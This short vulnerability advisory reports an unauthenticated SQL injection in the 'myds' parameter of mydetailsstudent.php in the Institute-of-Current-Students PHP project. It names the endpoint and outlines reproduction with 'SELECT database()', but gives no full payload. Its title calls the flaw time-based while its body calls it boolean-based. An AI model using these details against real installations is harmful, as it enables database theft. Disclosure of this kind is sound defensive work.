Institute-of-Current-Students Time-Based Blind SQL Injection Vulnerability in mydetailsstudent.php

A time-based blind SQL injection vulnerability has been identified in the Institute-of-Current-Students PHP project, version 1.0. The issue resides in the mydetailsstudent.php endpoint, where the myds GET parameter is improperly sanitized before being incorporated into SQL queries. This flaw allows attackers to execute arbitrary SQL commands, potentially leading to unauthorized access and extraction of database information.

Impact

Exploitation of this vulnerability could result in unauthorized access to database contents, allowing for the full extraction of data from the icsnew database. The vulnerability enables boolean-based SQL injection, which can be exploited remotely without authentication.

Reproduction

To reproduce this vulnerability, send a GET request to the mydetailsstudent.php endpoint with the myds parameter. The payload can be crafted to include SQL injection techniques, such as manipulating boolean conditions or using SQL injection payloads that exploit the application's SQL query handling. The injection can be confirmed by, for example, executing 'SELECT database()' to reveal the current database name.